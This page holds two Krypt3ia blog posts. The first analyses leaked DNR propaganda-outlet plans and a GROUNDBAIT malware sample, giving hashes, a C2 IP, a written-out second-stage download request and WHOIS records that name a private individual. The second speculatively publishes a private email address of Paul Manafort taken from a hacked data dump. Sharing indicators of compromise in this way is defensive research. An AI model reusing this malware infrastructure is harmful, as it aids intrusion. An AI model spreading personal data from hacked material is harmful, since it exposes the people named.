It’s interesting they note that they’ll be playing games with the tax status of their employees — like in the U.S., there’s a difference between paying people as staff (where the employer has to pay a chunk of the taxes) and as freelancers (where the poor schmuck has to pay for everything). Also, in Ukraine, folks living in the disputed territories don’t have to pay taxes. They’re saying that they can save 40% as a result of playing around with this, which they claim is common practice in the Ukraine.

So not only are they undermining a foreign government, but trying to avoid paying taxes while they do it! I don’t know which is worse.

Document docxk7EDEjG06i is a plan for creating a major national media outlet from scratch. It will take $347,640 in startup costs, and about $146,500 a month in ongoing expensies. Total costs, for an eight-month period, are $3.82 million, including advertising costs, and other related expenses. Again, they’re playing around with the taxes. And they’re expecting to get a quarter million visitors a day on weekdays.

This one also has a budget for protection against DDOS attacks. They estimate that this will cost $2,000 a month (including the site hosting itself).

They also plan to sell advertising here, and have an ad sales department, and the editor in chief’s salary will be $10,000 a month plus a share of the ad revenues.

That’s not too shabby… Then they’ve got some projections for costs and revenues after that first eight-month period, which is interesting for those of our readers who plan to launch an online magazine in the Ukraine…

DOC3

From Translator: This is super evil. I’m really impressed! The idea is is to create a pro-European, anti-Russian website — with the underlying message that the Ukraine will be better off without those annoying eastern provinces, and let Russia have them, so that it can enjoy its wonderful European future without them dragging the country down. So, again, they have an editorial budget. $69,900 in setup expenses, $65,000 a month in ongoing expenses, and plans to reach 100,000 readers a day on weekdays.

DOC4

From Translator: This is a plan to create a news site to cover the conflict in the disputed territories, because people are hungry for war news. The idea is to make it seem objective and independent, but slip in a pro-Russian point of view. So they’ll use terms associated with anti-Russian reporting, but slant the coverage to make Ukraine look bad. Yicch. Startup expenses: $97,200, ongoing expenses: $126,500 per month, expected audience: 120,000 unique visitors a day during weekdays.

DOC5

From Translator: This is an analysis of the Ukrainian political system and how a lot of work is done by “shadow” organizations in government. There don’t seem to be any action items here.

DOC6

From translator: This is an overview of the Ukrainian media climate, and on how anti-Russian it is, and blames Western advisers for some of it.

So here is the context from these documents from the translator for you…

From Translator: These emails seem to have been sent to Georgi Bryusov, who heads up Russia’s wresting federation, and are in reference to a meeting with “PB.” I don’t know who “PB” is.

Bryusov then forwarded them on to Surkov.

So, how likely is this?

Well, I spent a some time covering a similar conflict in Georgia, where there was also a “separatist” province, called Abkhazia, and the conflict there was used to put pressure on the Georgian government. Although it was supposed to be a purely local, homegrown movement, Abkhazia — which didn’t even have an airport — somehow had fighter jets and bombed Georgian-controlled areas with them. (I was in one of those areas with a group of UN observers while it was being bombed. Fun! The Georgians shot down one of the planes which … surprise, surprise! … turned out to have a Russian pilot inside.)

Russia also paid the operating costs for the Abhazian press center, where I spent many a happy day. All international phones calls were free! I could call my editors anywhere in the world, and file stories about the brave Abkhazian rebels! They also fed us and provided us a place to sleep, and organized regular trips to the front lines where we could enjoy being shot at by the Georgians. They also showed us how well prisoners of war were treated and corpses of people killed by the Georgias and, allegedly, mutilated. (Though the Red Cross folks I talked to couldn’t confirm that the mutilations were real and not, say, the expected results of getting too close to an explosion.)

Anyway, the bottom line is that I do have personal experience of Russian spending gold to manipulate the media, in case anyone ever had any doubts that they were willing to do it.

As you can see from the commentary above, and you too can read the documents as well, the Russians set up a media company including websites and formulated plans to manipulate people toward the Donetsk People’s Republic and against a Free Ukraine. I am still going through the dump looking for the bills for the domains mentioned as well and will run them through Threatcrowd and other sources to see if they were used at all for malware C2 and propagation. Which brings me to the use of dnr-online as a C2. Interestingly enough the site itself is not a C2 but it does have connectivity to other IP addresses and domains that are.

dnr-online.ru

WHOIS for dnr-online.ru

5.101.152.66

The archology of malware that talks to 5.101.152.66 is rather interesting. There’s a bit of everything bad attached to that one to be sure including that MrSweet address that is ransomeware central. 5.101.152.66 is owned/created by beget.ru which has quite the many few dirty connections as well.

beget.ru WHOIS

beget.ru

Of course beget could be innocent enough but as you can see there is enough of Mos Eisley in there to make one not want to get an account there and set up a site right? I will continue to look into other domains within the networks that dnr-online bought as soon as I can locate the bills for them or domain names and that will be another post I am sure. What all of this tells you though, is that the Russians have always been carrying out these kinds of active measures against people like those in Ukraine as well as what they did to us in the election of 2016. This is not a one time deal and certainly will not be the last one we shall see. In fact, the bots and the domains will continue to be set up by the likes of the SVR and GRU in hopes of manipulating the general populace toward the goals of the Putin regime until it’s demise.

… and likely past it.

THE MALWARE & GROUNDBAIT:

Right! now on to the other interesting bit found in the dump from dnr-online. In looking at the spool I dumped all attachments into a folder and began checking them for malware. All the word docs, excel sheet, power-points etc. The docs all checked out but one zip file had a .scr file in it that turned out to be malware. The file (Центр управления восстановлением ДНР справка-доклад за 13 октября 2015 года.exe) Center for Recovery Management of the DNR certificate-report for October 13, 2015.exe came from an email comiing in from a Russian source to the head of dnr-online. I am unable to source the headers at this time of the email but the question becomes was this malware sent to the DNR by RUH8 or was this malware sent to DNR to send to others in some other campaign. I cannot say either way but, the malware is a new sample of GROUNDBAIT or Prikormka that was detected and reported on by ESET running rampant in Ukraine. Given that ESET claims that this malware was being used against the separatists in Ukraine it stands to reason that the logic here is that the malware was to be used by the propaganda campaign against those it was seeking to manipulate. However, the nagging thing for me is the way this was passed around. The email has no real context in the text and to me it seems to imply that it is a fix for things inside dnr. My other thought is that maybe someone got hold of the GROUNDBAIT raw sample and re-used it by re-packing it and setting it against dnr-online.

An interesting notion…

I contacted ESET and talked a bit with the guy who did the work and he was.. Well.. Not so helpful. So here are the IOC’s for this file for you all to look for.

IOC’s

Filename: Recovery Control Center Help DNR-Report for October 13, 2015
Filetype:.exe
SHA256: f9a96ad58fb946981d196d653ec28fa31d6f946a7e2f6784b317dd9adc557b62 (AV positives: 52/57 scanned on 04/30/2016 07:33:42)
File raw: zip file: zipnh4dZDtMUk.zip

https://www.hybrid-analysis.com/sample/4eaf154ce8974228db6e35a1364337a12b821b73f052a44dc24ebdf0c1da6a4e?environmentId=100
https://virustotal.com/en/file/4eaf154ce8974228db6e35a1364337a12b821b73f052a44dc24ebdf0c1da6a4e/analysis/1484661011/

https://virustotal.com/en/file/4eaf154ce8974228db6e35a1364337a12b821b73f052a44dc24ebdf0c1da6a4e/analysis/1484661011/

Dropped executables
“archive.rar” has type “gzip compressed data from NTFS filesystem (NT)”
“helpldr.dll” has type “PE32 executable (DLL) (GUI) Intel 80386 for MS Windows”
“samlib.dll” has type “PE32 executable (DLL) (GUI) Intel 80386 for MS Windows”
“rbcon.ini” has type “ASCII text with CRLF line terminators”

Writes directory archive.rar (exfil)

C2 connected:185.68.16.35
Connects and downloads second stage: GET http://wallejob.in.ua/wd.php?sn=2120161230091201&rb=7&ob=R_pol_x&bt=0 HTTP/1.1

https://www.threatcrowd.org/ip.php?ip=185.68.16.35
https://www.threatcrowd.org/malware.php?md5=7accb6fed266a2023659f438ad1b3546
domain:      wallejob.in.ua
descr:       Domain registered for customer of Ukraine.com.ua
admin-c:     UKRAINE-UANIC
tech-c:      UKRAINE-UANIC
status:      OK-UNTIL 20170619000000
nserver:     ns114.inhostedns.com
nserver:     ns214.inhostedns.net
nserver:     ns314.inhostedns.org
mnt-by:      UKRAINE-MNT-INUA
mnt-lower:   UKRAINE-MNT-INUA
changed:     hostmaster@ukraine.com.ua 20160907200219
source:      INUA

Found malicious artifacts related to “185.68.16.35” (ASN: , Owner: ): …
URL: http://wood-house.com.ua/ (AV positives: 2/68 scanned on 12/27/2016 16:55:43)
https://www.threatcrowd.org/domain.php?domain=wood-house.com.ua

URL: http://wallejob.in.ua/ (AV positives: 5/68 scanned on 11/17/2016 02:10:28) <—GROUNDBAIT C2
https://www.threatcrowd.org/domain.php?domain=wallejob.in.ua
https://www.hybrid-analysis.com/sample/319e9dc36678c4d774ba0765ec93d3160bd476ab0f98bac1b7e5b92e7994a88a/?environmentId=1

URL: http://zarabatak.ru/ (AV positives: 1/68 scanned on 07/20/2016 10:59:29)
https://www.threatcrowd.org/domain.php?domain=zarabatak.ru

URL: http://psh.co.ua/ (AV positives: 1/68 scanned on 07/14/2016 04:35:37)
https://www.threatcrowd.org/domain.php?domain=psh.co.ua

URL: http://sem-dev.co.ua/ (AV positives: 1/68 scanned on 07/14/2016 04:33:23)
https://www.threatcrowd.org/domain.php?domain=sem-dev.co.ua

wood-house.com.ua
domain:           wood-house.com.ua
dom-public:       NO
registrant:       xdkjv649
mnt-by:           ua.intermedia
nserver:          ns311.inhostedns.org
nserver:          ns211.inhostedns.net
nserver:          ns111.inhostedns.com
status:           ok
created:          2014-11-07 13:31:27+02
modified:         2016-11-03 16:37:39+02
expires:          2017-11-07 13:31:27+02
source:           UAEPP

registrar:        ua.intermedia
organization:     SE Rabotnov Volodymyr
organization-loc: ФОП Работнов Володимир Володимирович
url:              http://names.com.ua
city:             Melitopol
country:          UA
source:           UAEPP

contact-id:       xdkjv649
person:           Vladimir V Rabotnov
person-loc:       Работнов Владимир Владимирович
e-mail:           not published
address:          not published
address-loc:      not published
phone:            not published
mnt-by:           ua.intermedia
status:           ok
status:           linked
created:          2013-04-05 15:01:02+03
modified:         2014-01-08 23:42:17+02
source:           UAEPP

 

TYING IT ALL TOGETHER:

So what we have here is the insider’s view of how dnr-online, a propaganda wing within Ukraine’s Donetsk People’s Republic put together a media service(s) and planned to use them as a framework of Russian propaganda in the region. We also have malware that is known to be actual spycraft in the region within it’s mail spool being passed around at least to two sources inside, one of them being the director of the DNR company. Was that malware meant to infect and eventually allow for the dump in the darknet or was the malware being passed along for other uses that we cannot see in this spool dump? In either case this information makes it clear that in Ukraine the Russian propaganda and espionage machines are alive and well and using the net as a force multiplier at the very least.

I will continue looking at the growing dumps by RUH8 and let you all know about any malware and goodies that pop up. It is also of interest to you all that this dump has been around and certain groups have looked at it and just sort of said “Nothing to see here” which is interesting to me. I mean malware that no one has seen really and plans for propaganda in the region are of no interest? I guess maybe these groups just did not want to spent the cycles on looking deeper into the data. I actually did with the help of others as well as checked the forensics on the metadata to insure the stuff was real.

…but that’s just me… I am not a churnalist.

Oh well..

More when I have it.

K.

UPDATE!: One day after this report one IP address involved as a nexus of malware has changed it’s domain name! Coincidence? Hmmmm?

Screenshot from 2017-03-29 06-14-33

Written by Krypt3ia

2017/03/28 at 13:00

About That Manafort Leak…

with 3 comments

Paul Manafort, campaign worker for Donald Trump, president and chief executive of Trump Organization Inc. and 2016 Republican presidential candidate, not pictured, speaks with the press during an election night event in New York, U.S., on Tuesday, April 19, 2016. Trump, the billionaire real-estate mogul, got a major boost in his quest to secure the Republican nomination with a majority of delegates but could not eliminate the possibility of a contested convention. Photographer: Victor J. Blue/Bloomberg via Getty Images

Paul Manafort, campaign worker for Donald Trump, president and chief executive of Trump Organization Inc. and 2016 Republican presidential candidate, not pictured, speaks with the press during an election night event in New York, U.S., on Tuesday, April 19, 2016. Trump, the billionaire real-estate mogul, got a major boost in his quest to secure the Republican nomination with a majority of delegates but could not eliminate the possibility of a contested convention. Photographer: Victor J. Blue/Bloomberg via Getty Images

So yeah, I posted a story last week about how a dump of data in the darknet seemed to be in fact Paul Manaforts daughter’s iPhone. It seems that this story was just too good to lose for Politico and the unscrupulous reporter there lifted not only my story but also my images! (yes the hashes match, he just saved them local and re-named themPolitico has done nothing to remedy this and they are churnalists of the worst kind, but they did at least call some people in the Manafort court to see if they would admit to the hack and they did. I could have told them that the hack was real because there was more that I did not post on the blog last time. The fact of the matter is that in the dump there was also a SQL dbase that I got hold of, and in that dump there’s one little interesting factoid. Paul Manafort has an email address that seems to be on a personal domain that isn’t really known about. In the dump connecting with his daughter is a personal iPhone for Paul and in that connection via text is his email address (pmanafort@dmpint.com) when you look up this domain you can see it is one of a few that belong to the Manafort family but registered by another party; one Todd Hankins. Now it seems to me that in an era of “BUT HER EMAILS” this factoid might be of interest to say, I dunno, the IC that he has this and his email is being sent to and from this cutout domain.

screenshot-from-2017-02-27-09-14-29

screenshot-from-2017-02-27-09-13-52

Now the domain has never had a site on it and as far as I can see with the limited looking I have done this domain has been kept kinda on the downlow as the Manafort name is not on it like the others. The ONLY thing connecting it to Paul now is the email address and the fact that Todd there set it up for him in 2010. I personally find that interesting… You? I have passed this little tidbit to the right people but now I am going to go wide with it… One wonders as to what emails might lay within that pesky little email system at dmpint.com

screenshot-from-2017-02-27-09-22-44

screenshot-from-2017-02-27-09-22-04

Let the FISA WARRANTS FLY!

K.

PS!!!

Google that domain and see what you get… It comes up all Ukraine travel sites… What does Google know hmmmmm?

Written by Krypt3ia

2017/02/27 at 14:23

Posted in Games, OSINT, Russia, Tradecraft